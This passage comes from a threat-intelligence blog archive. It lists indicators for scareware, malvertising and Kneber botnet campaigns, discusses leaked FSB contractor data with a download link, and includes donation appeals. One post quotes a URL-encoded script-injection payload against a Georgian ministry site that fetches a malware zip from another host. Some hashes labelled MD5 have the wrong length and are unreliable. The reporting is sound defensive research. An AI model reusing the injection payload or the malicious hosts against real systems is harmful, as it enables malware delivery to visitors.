hxxp://surfremover.com

hxxp://stratosearch.com

hxxp://swiftcleaner.com

hxxp://tallgrass-seach.com

hxxp://traffalo.com

hxxp://traveltray.com

hxxp://sutoppuwirusu.com

hxxp://syssauvegarde.com

hxxp://systemerrorfixer.com

hxxp://systemesansfaute.com

hxxp://systemesansvirus.com

hxxp://systemhoover.com

hxxp://systemschild.com

hxxp://tackanejvirus.com

hxxp://tilforlatelig.com

hxxp://toolsicuro.com

hxxp://topsalgantivirus.com

hxxp://trasheraser.com

hxxp://trusselovervagning.com

hxxp://trustedantivirus.com

hxxp://trustedprotection.com

hxxp://tryggpcverktyg.com

hxxp://trygpcbruger.com

943

hxxp://turnkeyantivirus.com

hxxp://unidadessanas.com

hxxp://usuarioprotegido.com

hxxp://utiledereparation.com

hxxp://vitecmedia.com

hxxp://waytotheprofit.com

hxxp://windefender.com

hxxp://wontu-search.com

hxxp://utilisateursur.com

hxxp://vaktmotvirus.com

hxxp://veiligheidsagent.com

hxxp://virenvernichter.com

hxxp://virusbekaemper.com

hxxp://viruskrakker.com

hxxp://virussperr.com

hxxp://virusurimuva.com

hxxp://virusvanger.com

hxxp://virusvijand.com

hxxp://volumformatredskap.com

hxxp://wirusufinisshu.com

hxxp://wirusuk.com

hxxp://wirusukyua.com

hxxp://aboutstat.net

hxxp://freeorangestats.com

hxxp://newstat.net

hxxp://aboutstat.net

hxxp://freeorangestats.com

hxxp://getmosales.com

hxxp://newstat.net

hxxp://sexprofit.com

hxxp://ad2cash.net

hxxp://admiragroup.com

hxxp://antispyexpert.com

hxxp://antispyexpertpro.com

hxxp://getmosales.com

hxxp://malwarecrash.com

hxxp://adtraff.com

hxxp://bucksbill.com

hxxp://burnads.com

hxxp://forceup.com

hxxp://freetvnow.com

hxxp://getfreecar.com

hxxp://adtraff.com

hxxp://adzyclon.com

hxxp://checkm8.com

hxxp://adtraff.com

hxxp://blessedads.com

hxxp://prevedmarketing.com

hxxp://checkm8.com

hxxp://newbieadguide.com
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hxxp://blessedads.com

hxxp://prevedmarketing.com

hxxp://malwarecrashpro.com

hxxp://bestadmedia.com

hxxp://bestsearchnet.com

hxxp://blessedads.com

hxxp://bucksbill.com

hxxp://burnads.com

hxxp://burnads.com

hxxp://casinoaceking.com

hxxp://cryptdrive.com

hxxp://newbieadguide.com

hxxp://blessedads.com

hxxp://prevedmarketing.com

hxxp://fileprotector.com

hxxp://forceup.com

hxxp://forceup.com

hxxp://freetvnow.net

hxxp://fulsearch.com

hxxp://games.biz

hxxp://Imamis.net

hxxp://Individ-search.com

hxxp://Information-advertising.info

hxxp://Infyte.com

hxxp://getfreecar.com

hxxp://greyhathosting.com

hxxp://netmediagroup.net

hxxp://netturbopro.com

hxxp://newbieadguide.com

hxxp://getfreecar.com

hxxp://greyhathosting.com

hxxp://netmediagroup.net

hxxp://netturbopro.com

hxxp://newbieadguide.com

hxxp://greyhathosting.com

hxxp://installprovider.com

hxxp://libresystm.com

hxxp://loffersearch.com

hxxp://magicsearcher.com

hxxp://malware-scan.com

hxxp://manage-search.com

hxxp://megashopcity.com

hxxp://mightyfaq.com

hxxp://misc-search.com

hxxp://moneycometrue.com

hxxp://moneypalacecash.com

hxxp://myhealth-life.org

hxxp://myonlinefinance.com

hxxp://mysurvey4u.com

hxxp://netmediagroup.net
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hxxp://netturbopro.com

hxxp://newbieadguide.com

hxxp://newstat.net

hxxp://newbieadguide.com

hxxp://blessedads.com

hxxp://prevedmarketing.com

hxxp://pcsupercharger.com

hxxp://performanceoptimizer.com

hxxp://popupnukerpro.com

hxxp://prizesforyou.com

hxxp://traffalo.com

hxxp://uniqads.com

hxxp://popadprovider.com

hxxp://popsmedia.com

hxxp://popupnukerpro.com

hxxp://prevedmarketing.com

hxxp://prevedmarketing.com

hxxp://prizesforyou.com

hxxp://proximogroup.com

hxxp://adtraff.com

hxxp://bucksbill.com

hxxp://burnads.com

hxxp://forceup.com

hxxp://freetvnow.com

hxxp://proximogroup.com

hxxp://rocktheads.com

hxxp://roller-search.com

hxxp://rombic-search.com

hxxp://se7ensearch.com

hxxp://search-expand.com

hxxp://search-the-prey.com

hxxp://Cryptdrive.com

hxxp://Deuscleanerpay.com

hxxp://Easybestdeals.com

hxxp://Eroticabsolute.com

hxxp://Marketingdungeon.com

hxxp://Mediatornado.com

hxxp://Megashopcity.com

hxxp://Mightyfaq.com

hxxp://Mobilesoftmarketing.com

hxxp://Moneycometrue.com

hxxp://Moneypalacecash.com

hxxp://Cheap-auto-deals.com

hxxp://Checkstocklist.com

hxxp://Chushok.com

hxxp://Clever-at-search.com

hxxp://Mobilesoftmarketing.com

hxxp://Mobiletops.com

hxxp://Mobilorg.org

hxxp://Moneycometrue.com
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hxxp://searchcolours.com

hxxp://searchmandrake.com

hxxp://searchonline-ease.com

hxxp://searchoperation.com

hxxp://searchvirtuoso.com

hxxp://sellmoresoft.net

hxxp://sellmysoft.net

hxxp://malware-scan.com

hxxp://sharpadverts.com

hxxp://shivanetworking.com

hxxp://shivanetworking.com,

hxxp://deuscleaneronline.com

hxxp://shivanetworking.com

hxxp://simplesamplesearch.com

hxxp://soccernet

hxxp://burnads.com,

hxxp://adtech.de

hxxp://blessedads.com,

hxxp://performanceoptimizer.com

hxxp://softwareprofit.com

hxxp://softwcs.com

hxxp://stratosearch.com

hxxp://tallgrass-seach.com

hxxp://theringtonesource.com

hxxp://traffalo.com

hxxp://traveltray.com

hxxp://treekindsearch.com

hxxp://unicsearch.com

hxxp://uniqads.com

hxxp://upg-soft.net

hxxp://vitecmedia.com

hxxp://wewillfind.com

hxxp://win.com

hxxp://windefender.com

hxxp://workhomecentre.com

hxxp://zappinads.com

hxxp://windefender.com

hxxp://wontu-search.com

hxxp://workhomecenter.com

hxxp://yourseeker.com

hxxp://yourshopz.com

hxxp://yourteacheronline.com

hxxp://zappinads.com

hxxp://zooworld-search.com

Related domains known to have participated in the campaign:

hxxp://adtraff.com – 190.15.73.254

hxxp://forceup.com – 190.15.73.254

hxxp://burnads.com – 190.15.73.254

hxxp://blessedads.com – 190.15.73.254
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hxxp://prevedmarketing.com – 190.15.73.254

hxxp://r2d2adverising.com – 190.15.73.254

hxxp://shivanetworking.com – 190.15.73.254

We’ll post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2019/07/exposing-evgeniy-mikhaylovich-bogachev.html

2. https://ddanchev.blogspot.com/2008/02/malicious-advertising-malvertising.html

3. https://www.fbi.gov/wanted/cyber/shaileshkumar-p.-jain

4. https://www.fbi.gov/wanted/cyber/bjorn-daniel-sundin
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Assessing the Recently Leaked FSB Contractor Data - A Peek Inside Russia’s Understanding of Social Net-

work Analysis and Tailored Access Operations (2019-08-02 15:20)

I’ve recently managed to obtain a copy of the recently leaked FSB contractor data courtesy of 0v1ru $ and "Digital

Revolution" and I’ve decided to take a closer look including an in-depth overview and discussion of the leaked data

in the context of today’s modern-driven AI-powered automated OSINT technologies in the broader context of the

U.S Intelligence Community in particular the utilization of rogue TOR exit nodes for the purpose of intercepting

and harvesting TOR exit node data within the Russian Federation including social-network analysis data-mining and

possible "lawful surveillance" and "lawful interception" including possible data collection type of Tailored Access Operation campaigns launched by " 0day Technologies" and " SyTech".

Sample Company Logo:

Sample Company Logo:
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Sample personal photos of the individuals behind "0day Technologies" and "SyTech":
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Sample Screenshots of the User-Interface behind the "Lawful Surveillance" and "Lawful Interception":
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Sample Screenshots of the Rogue and Bogus Tor-Exit-Node Research Project:
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Sample URLs involved in the campaign:

hxxp://0day.ru

hxxp://sytech.ru

Sample Telegram account involved in the campaign:

hxxp://t.me/D1G1R3V _DigitalRevolution

Sample Vkontakt account involved in the campaign:

hxxp://vk.com/d1g1r3v

Sample Twitter account involved in the campaign:

hxxp://twitter.com/d1g1r3v

hxxp://twitter.com/0v1ruS

Sample URL known to have participated in the campaign:

hxxp://d1g1r3v.net

Related URL of the currently leaked data:

https://mega.nz/ #F!3c0lTaLI!jVUS _O7Q0opCHUPYgK1E _w
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g0t Bitcoin? (2019-08-19 12:51)

Dear blog readers, dare to take a moment of your precious time to check a venerable and recently proposed

cyber security project investment including the opportunity to enter a Bold New World of Hacking and Information

Security? Has the time come to set them straight? Keep reading.

Check out this Onion - http://lkzihepprlhxtvbutjedoazbsqd4avmif hpjms3zuq7itceiu4qajwad.onion/ and do-

nate today!

Stay tuned!
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DDanchev is for Hire! (2019-09-07 14:38)

Looking for a full time threat intelligence analyst, cybercrime researcher, or a security blogger?

Approach me at dancho.danchev@hush.com
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Historical OSINT - The Russian Business Network Says "Hi" (2019-09-09 15:27)

You know you’re popular when "they" say "hi".

It’s 2009 and I’ve received a surprising personal email courtesy of guess who - The Russian Business Network

showing off the actual ownership of the hxxp://rbnnetwork.com domain and basically saying "hi". It’s worth pointing out that throughout 2008-2013 I’ve extensively profiled the activities including the customer activities of some of

the most prolific customers and members of the infamous Russian Business Network also known as the RBN in

the context of [1]blackhat SEO [2]iFrame and [3]input validation abuse across major [4]Web properties including

[5]malvertising and various other [6]malware-serving and [7]client-side exploits serving campaigns including

[8]money mule recruitment and [9]phishing campaigns the ubiquitous at the time [10]fake security software also known as scareware in a variety of post series.

• Related post - [11]Dissecting a Sample Russian Business Network (RBN) Contract/Agreement Through the

Prism of RBN’s AbdAllah Franchise

It’s been a decade since I last profiled the most prolific and sophisticated market-leading bullet-proof hosting

cybercrime enterprise - the Russian Business network which at the time was dominating the majority of campaigns

that I was busy profiling with the help of fellow researchers to whom I owe a big deal of thanks for approaching me

circa 2008-2013 namely [12]Jart Armin and [13]James McQuaid with whom I’ve been directly or indirectly keeping

in touch throughout 2008-2013 for the purpose of offering quality research on the activities of the Russian Business
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Network including their customers and fraudulent and malicious campaigns.

• Related post - [14]Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Multiple Interna-

tional Embassies

Stay tuned and thanks for reaching out!

Related Russian Business Network (RBN) Research:

[15]I See Alive IFRAMEs Everywhere - Part Two

[16]I See Alive IFRAMEs Everywhere

[17]Bank of India Serving Malware

[18]U.S Consulate in St.Petersburg Serving Malware

[19]Syrian Embassy in London Serving Malware

[20]CISRT Serving Malware

[21]Compromised Sites Serving Malware and Spam

[22]U.S Consulate St. Petersburg Serving Malware

[23]Massive RealPlayer Exploit Embedded Attack

[24]Malware Serving Exploits Embedded Sites as Usual

[25]MDAC ActiveX Code Execution Exploit Still in the Wild

[26]Yet Another Massive Embedded Malware Attack

[27]Embedding Malicious IFRAMEs Through Stolen FTP Accounts

[28]Over 100 Malwares Hosted on a Single RBN IP

[29]Detecting and Blocking the Russian Business Network

[30]Exposing the Russian Business Network

[31]Go to Sleep, Go to Sleep my Little RBN

[32]Injecting IFRAMEs by Abusing Input Validation

[33]RBN’s Fake Account Suspended Notices

[34]ZDNet Asia and TorrentReactor IFRAME-ed

[35]Russia’s FSB vs Cybercrime

[36]HACKED BY THE RBN!

[37]Rogue RBN Software Pushed Through Blackhat SEO

[38]Wired.com and History.com Getting RBN-ed

[39]The Russian Business Network

[40]Exposing the Russian Business Network

[41]More CNET Sites Under IFRAME Attack

[42]Embedded Malware at Bloggies Awards Site

[43]Have Your Malware In a Timely Fashion

[44]Geolocating Malicious ISPs

[45]More High Profile Sites IFRAME Injected

[46]The New Media Malware Gang - Part Four

[47]Another Massive Embedded Malware Attack

1. https://ddanchev.blogspot.com/search/label/Blackhat%20SEO

2. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

3. https://ddanchev.blogspot.com/2008/03/injecting-iframes-by-abusing-input.html

4. https://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html

5. https://ddanchev.blogspot.com/search/label/Malvertising

6. https://ddanchev.blogspot.com/search/label/Online%20Fraud

7. https://ddanchev.blogspot.com/search/label/Client-Side%20Exploits

8. https://ddanchev.blogspot.com/search/label/Money%20Mule
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9. https://ddanchev.blogspot.com/search/label/Phishing%20Campaign

10. https://ddanchev.blogspot.com/2011/02/a-diverse-portfolio-of-fake-security.html

11. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

12. http://rbnexploit.blogspot.com/

13. https://securehomenetwork.blogspot.com/

14. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

15. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

16. https://ddanchev.blogspot.com/2007/11/i-see-alive-iframes-everywhere.html

17. http://ddanchev.blogspot.com/2007/08/bank-of-india-serving-malware.html

18. http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

19. http://ddanchev.blogspot.com/2007/09/syrian-embassy-in-london-serving.html

20. http://ddanchev.blogspot.com/2007/10/cisrt-serving-malware.html

21. http://ddanchev.blogspot.com/2007/10/cisrt-serving-malware.html

22. https://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

23. https://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

24. https://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

25. https://ddanchev.blogspot.com/2007/12/mdac-activex-code-execution-exploit.html

26. https://ddanchev.blogspot.com/2007/12/mdac-activex-code-execution-exploit.html

27. https://ddanchev.blogspot.com/2008/03/embedding-malicious-iframes-through.html

28. https://ddanchev.blogspot.com/2008/03/embedding-malicious-iframes-through.html

29. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

30. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

31. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

32. https://ddanchev.blogspot.com/2008/03/injecting-iframes-by-abusing-input.html

33. https://ddanchev.blogspot.com/2008/01/rbn-fake-account-suspended-notices.html

34. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

35. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

36. https://ddanchev.blogspot.com/2008/04/hacked-by-rbn.html

37. https://ddanchev.blogspot.com/2008/03/rogue-rbn-software-pushed-through.html

38. https://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html

39. https://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html

40. https://ddanchev.blogspot.com/2007/11/exposing-russian-business-network.html

41. https://ddanchev.blogspot.com/2007/11/exposing-russian-business-network.html

42. https://ddanchev.blogspot.com/2008/03/embedded-malware-at-bloggies-awards-site.html

43. https://ddanchev.blogspot.com/2008/03/embedded-malware-at-bloggies-awards-site.html

44. https://ddanchev.blogspot.com/2008/02/geolocating-malicious-isps.html

45. https://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

46. https://ddanchev.blogspot.com/2008/03/the-new-media-malware-gang-part-four.html

47. https://ddanchev.blogspot.com/2007/11/another-massive-embedded-malware-attack.html
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Join Me on Patreon Community! (2019-09-09 18:07)

Dear blog readers,

I decided to let everyone know that I’ve recently launched my own [1]Patreon Community Page with the idea

to let everyone know that I’m currently busy crowd-funding a high-profile upcoming Cyber Security Investment

Project - and I would love to hear from you more details about your thoughts regarding new Tier Features and

whether or not you could make a possible long-term type of financial donation or sponsorship regarding my research

and my security expertise.

The current status of the project:

- I’m currently busy soliciting additional input from colleagues regarding upcoming Tier Features

- I’m currently busy reaching out to colleagues to possibly convert them to Patreon Sponsors

- I’m currently busy working on a high-profile Security Podcast

- I’m currently busy working on a high-profile Security Newsletter

Has my research helped you or your organization in the past? Have you been a long-time blog reader? Have

you learned something new? Did my active cybercrime and nation-state actor profiling helped you excel in your

career path? Are you happy with what you’re seeing? Dare to take a moment and refer a colleague or an organi-

zation my personal blog including my [2]Patreon Community Page including a possible Patreon Sponsor request

confirmation?

Looking forward to hearing from you at - dancho.danchev@hush.com

Enjoy!

1. https://www.patreon.com/bePatron?u=15880233

2. https://www.patreon.com/ddanchev123
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Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild (2019-09-11 16:53)

I’ve recently came across to a rogue NordVPN web site distributing malicious software potentially exposing NordVPN

users to a multi-tude of malicious software further compromising the confidentiality availability and integrity of the

targeted host to a multi-tude of malicious software.

In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and discuss in-depth

the tactics techniques and procedures of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://nord-vpn.club - 192.64.119.159; 2.56.215.159

Sample malicious MD5s known to have participated in the campaign:

MD5: 3c24aa2c26e3556194ffd182a4dfaae5a41f

MD5: 7d6c24992eff0d64f19c78f05ea95ae44bc83af1

MD5: d39c320c3a43873db2577b2c9c99d9bf2bdb285c

MD5: d5ed3c70a8d7213ed1b9a124bbc1942e2b8cfeea

MD5: e89efde8ae72857b1542e3ae47f047c54b3d341a

MD5: 59f511ea1e34753f41a75e05de96456ca28f14a7

MD5: 453c428edda0fc01b306cc6f3252893fce9763a7
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Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving

Malware Courtesy of the Kneber Botnet (2019-09-11 19:07)

It’s 2010 and I’ve recently came across to a compromised Georgian Government Ministry of Defense and Ministry of

Justice official Web site spreading potentially participating in a wide-spread phishing and malware-serving campaign

enticing users into interacting with the rogue U.S Intelligence and U.S Law Enforcement themed emails for the

purpose of spreading and dropping malicious software on the targeted host’s PC.

Sample malicious URL known to have participated in the campaign abusing common Web Site redirection applica-

tion vulnerability flaw:

hxxp://www.mod.gov.ge/2007/video/movie.php?l=G &v= %20 %3E %20a %20href %20http %3A %2F %2Foffi-

cialweightlosshelp.org %2Fwp-admin %2Freport.zip %20 %3EDownload %20 %3C %2Fa %3E %20script %3Ewin-

dow.OPEN %20http %3A %2F %2Fofficialweightlosshelp.org %2Fwp-admin %2Freport.zip %20 %3C %2Fscript %3E

%20 #05184916461921807121
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Related malicious URLs known to have participated in the campaign:

hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:

hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:

hxxp://new.justice.gov.ge/files/Headers/in.txt

hxxp://new.justice.gov.ge/files/Headers/fresh.txt

hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in the campaign:

MD5: d0c0a2e6b30f451f69df9e2514ba36f2

MD5: 974a4a516260a4fafb36234897469013

MD5: ecb7304f838efb8e30a21189458b8544
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MD5: 81b3bff487fc9a02e10288114fc2b5be

MD5: 234523904033f8dc692c743cbcf5cf2b

MD5: e2fffaffc1064d24e7ea6bab90fd86fc

MD5: 5941c9b5bd567c5baaecc415e453b5c8

MD5: 0ff325365f1d8395322d1ef0525f3b1f

MD5: 4437617b7095ed412f3c663d4b878c30

MD5: eb66a3e11690069b28c38cea926b61d2

MD5: 2b7e4b7c5faf45ebe48df580b63c376b

Known to have participated in the campaign are also the following two domains part of the Hilary Kneber

botnet:

hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com

hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in the campaign:

hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

hxxp://rapidshare.com/files/318309046/CYBERCAFE.zip.html

hxxp://www.sendspace.com/file/fmbt01

hxxp://hkcaregroup.com/modlogan/MILSOFT.zip

hxxp://rapidshare.com/files/320369638/MILSOFT.zip.html

hxxp://fcpra.org/downloads/MILSOFT.zip

hxxp://fcpra.org/downloads/winupdate.zip

hxxp://www.sendspace.com/file/tj373l

hxxp://mv.net.md/update/update.zip - 195.22.225.5

hxxp://www.sendspace.com/file/7jmxtq

hxxp://mv.net.md/dsb/DSB.zip

hxxp://www.sendspace.com/file/rdxgzd

hxxp://timingsolution.com/Doc/BULLETIN.zip

hxxp://www.sendspace.com/file/goz3yd

hxxp://dnicenter.com/docs/report.zip

hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 222.122.60.1

hxxp://www.sendspace.com/file/h96uh1

hxxp://depositfiles.com/files/xj1wvamc4

hxxp://tiesiog.puikiai.lt/report.zip

hxxp://somashop.lv/report.zip

hxxp://www.christianrantsen.dk/report.zip

hxxp://enigmazones.eu/report.zip

hxxp://www.christianrantsen.dk/report.zip

hxxp://enigmazones.eu/report.zip

hxxp://gnarus.mobi/media/EuropeanUnion _MilitaryOperations _EN.zip

hxxp://quimeras.com.mx/media/EuropeanUnion _MilitaryOperations _EN.zip - 66.147.242.169

Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://dhsinfo.info - 218.240.28.34

hxxp://greylogic.info - 218.240.28.34; 218.240.28.4

hxxp://intelfusion.info - 218.240.28.34
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hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:

MD5: 8b3a3c4386e4d59c6665762f53e6ec8e

MD5: 5fb94eef8bd57fe8e20ccc56e33570c5

MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed a sample malware phones back to the following C &C server IPs:

hxxp://from-us-with-love.info - 91.216.141.171

hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin

hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in the Hilary Kneber botnet campaign:

hxxp://58.218.199.239

hxxp://59.53.91.102

hxxp://60.12.117.147

hxxp://61.235.117.71

hxxp://61.235.117.86

hxxp://61.4.82.216

hxxp://193.104.110.88

hxxp://95.169.186.103

hxxp://222.122.60.186

hxxp://217.23.10.19

hxxp://85.17.144.78

hxxp://200.106.149.171

hxxp://200.63.44.192

hxxp://200.63.46.134

hxxp://91.206.231.189

hxxp://124.109.3.135

hxxp://61.61.20.134

hxxp://91.206.201.14

hxxp://91.206.201.222

hxxp://91.206.201.8

hxxp://216.104.40.218

hxxp://69.197.128.203

Related malicious and fraudulent domains known to have participated in the Hilary Kneber botnet campaign:

hxxp://123.30d5546ce2d9ab37.d99q.cn

hxxp://d99q.cn

hxxp://524ay.cn

hxxp://adcounters.net

hxxp://adobe-config-s3.net

hxxp://mywarworld.cn

hxxp://aqaqaqaq.com

hxxp://avchecker123.com

hxxp://bizelitt.com

hxxp://biznessnews.cn
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hxxp://bizuklux.cn

hxxp://fcrazy.com

hxxp://fcrazy.eu

hxxp://boolred.in

hxxp://brans.pl

hxxp://britishsupport.net

hxxp://bulkbin.cn

hxxp://chaujoi.cn

hxxp://checkvirus.net

hxxp://chinaoilfactory.cn

hxxp://chris25project.cn

hxxp://client158.faster-hosting.com

hxxp://cwbnewsonline.cn

hxxp://cxzczxccc.com.cn

hxxp://dasfkjsdsfg.biz

hxxp://dia2.cn

hxxp://digitalinspiration.e37z.cn

hxxp://dolbanov.net

hxxp://dolcegabbana.djbormand.cn

hxxp://djbormand.cn

hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98

hxxp://sttcounter.cn

hxxp://dred3.cn

hxxp://dsfad.in

hxxp://e37z.cn

hxxp://e58z.cn

hxxp://electrofunny.cn

hxxp://electromusicnow.cn

hxxp://elsemon.cn

hxxp://fcrazy.info

hxxp://filemarket.net

hxxp://flo5.cn

hxxp://footballcappers.biz

hxxp://fobsl.cn

hxxp://forum.d99q.cn

hxxp://gamno6.cn

hxxp://gidrasil.cn

hxxp://gifts2010.net

hxxp://ginmap.cn

hxxp://giopnon.cn

hxxp://gksdh.cn

hxxp://glousc.com

hxxp://gnfdt.cn

hxxp://gold-smerch.cn

hxxp://goldenmac.cn

hxxp://google.maniyakat.cn

hxxp://maniyakat.cn

hxxp://greenpl.com

hxxp://grizzli-counter.com

hxxp://grobin1.cn
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hxxp://inpanel.cn

hxxp://itmasterz.org

hxxp://iuylqb.cn

hxxp://kaizerr.org

hxxp://keepmeupdated.cn

hxxp://khalej.cn

hxxp://kimosimotuma.cn

hxxp://klaikius.com

hxxp://klitar.cn

hxxp://kolordat482.com

hxxp://kotopes.cn

hxxp://liagand.cn

hxxp://love2coffee.cn

hxxp://majorsoftwareupdate.info

hxxp://marcusmed.com

hxxp://mcount.net

hxxp://mega-counter.com

hxxp://monstersoftware.info

hxxp://morsayniketamere.cn

hxxp://mydailymail.cn

hxxp://mynewworldorder.cn

hxxp://newsdownloads.cn

hxxp://nit99.biz

hxxp://nm.fcrazy.com

hxxp://nmalodbp.com

hxxp://not99.biz

hxxp://online-counter.cn

hxxp://pedersii.net

hxxp://piramidsoftware.info

hxxp://popupserf.cn

hxxp://qaqaqaqa.com

hxxp://qaqaqaqa.net

hxxp://qbxq16.com

hxxp://redlinecompany.ravelotti.cn

hxxp://ravelotti.cn

hxxp://relevant-information.cn

Related Hilary Kneber botnet posts:

[1]Keeping Money Mule Recruiters on a Short Leash

[2]Standardizing the Money Mule Recruitment Process

[3]Dissecting the Exploits/Scareware Serving Twitter Spam Campaign

[4]Koobface Botnet Starts Serving Client-Side Exploits

1. https://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

2. https://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. https://ddanchev.blogspot.com/2010/06/dissecting-exploitsscareware-serving.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
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I’m Back! (2019-09-17 09:56)

Dear blog readers - it’s been a while since I’ve last posted a quality update following my [1]disappearance and

possible kidnapping attempt circa 2010 but as many of you have noticed I’ve recently published a variety of

research and CYBERINT type of articles in a variety of areas which means that I’ll be shortly returning to the usual

blogging rhythm successfully publishing a quality set of research articles anytime soon. I’ve also wanted to let you

know that I’ve recently launched an extremely popular News Portal called [2]Unit-123 offering practical advice to

the U.S Intelligence Community including Cyber Warriors and Cyber Warfare experts including a Cyber Security and

Hacking Community called [3]Offensive Warfare including a Bitcoin soliciting bid on the Dark Web for the upcoming

launch of a proprietary custom-based Virtual Reality Social Network for Hackers and Security Experts called

[4]Cybertronics (dzxvmqrl3rjxbzuer6vv5ejahniz2nefqxfmwspfmvzjo4x xzm7n4xad.onion) including the usual

interview spree in an attempt to land a permanent job position as I’ve been working on a variety of personal and

proprietary Security and OSINT projects.
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• Are you interested in having me speak at your event? Are you interested in inviting me to join a classified and potentially sensitive event or research group? Are you interested in becoming a writer at this blog? Are you

interested in advertising at this blog? Feel free to approach me - disruptive.individuals@gmail.com

Consider going through some of my most recently published research:

• [5]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis

• [6]Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infastructure

• [7]Flashpoint Intel Official Web Site Serving Malware - An Analysis

• [8]Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer"

• [9]Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Campaign

- 2010

• [10]Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

• [11]Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [12]Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [13]Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfolio

Spotted in the Wild

• [14]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter

to the U.S Intelligence Community

• [15]Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis

• [16]Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Mal-

ware Courtesy of the Kneber Botnet

• [17]Historical OSINT - The Russian Business Network Says "Hi"

• [18]Profiling "Innovative Marketing" - The Flagship Malvertising andf Scareware Distributor - Circa 2008 - An

OSINT Analysis

• [19]Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT Analysis

• [20]Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts

In this post I’ll walk you though the story of my disappearance including a brief introduction and explanation of my

"hacker enthusiast" years circa the 90’s where I’ve been busy doing "lawful surveillance" and "lawful interception"

throughout my teenage years while I was not busy working full-time with several H/C/P/A

(Hacking/Cracking/Phreaking/Anarchy) groups as a full-time member practically setting up the foundations of the

Threat Intelligence market segment a few years later including the basics of Technical Collection type of position

including Independent Contractor working under NDA in a post 9/11 World including a personal greeting to

everyone who’s been approaching me and reaching out offering support and technical and operational "know-how"

including general "say hi" advice.
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I want to express a personal gratitude to a good old research friend - [21]Internet Anthropologist - who actually

[22]initiated a track-down action and managed to indirectly find me circa 2010 with the help of international and

Bulgarian law-enforcement including fellow colleagues and friends from the Security Industry and U.S Intelligence

Community circa 2008-2013 who attempted to track me down and find out more about my disappearance.

In this post I’ll discuss my visit to the GCHQ circa 2008 with the Honeynet Project including an in-depth discussion on

my "lawful interception" and "lawful surveillance" experience circa the 90’s throughout my teenage hacker years including an in-depth discussion on the hacking Scene that I was proud to be a member of throughout the 90’s

having successfully participated in a variety of community and commercial projects including a personal thanks to

the following friends and colleagues for offering support and keeping track of my research:

• [23]Jamie Riden for making a personal contribution to my PayPal account for research purposes

• [24]Steve Santorelli from Team Cymru for expressing interest in a proprietary Threats Database

• [25]Michal Salat for participating in a brief trial of my Threat Data service

• [26]Ian Cook for making a personal introduction to my current part-time employer [27]KCS Group Europe

• [28]Jeffrey Bardin from Treadstone71 who reached out and offered employment opportunity

• [29]Harrison Cook who’s been persistently donating and reaching out to support the Offensive Warfare 2.0

community

• [30]John Young from Cryptome.org who helped spread the word about the Offensive Warfare 2.0 Community

• [31]Liran Sorani from Webhose for the opportunity to participate in a part-time project
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An In-depth Analysis of the Hacking Scene circa the 90’s through the prism of Dancho Danchev also known as tHe

mAnIaC:
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In a World where we’ve successfully set the foundation of offensive clandestine and psychological operations

including the foundations of Technical Collection and the foundations of the [32]Threat Intelligence market

segment including the persistent emphasis on cyber threats facing U.S Government and U.S National Infrastructure

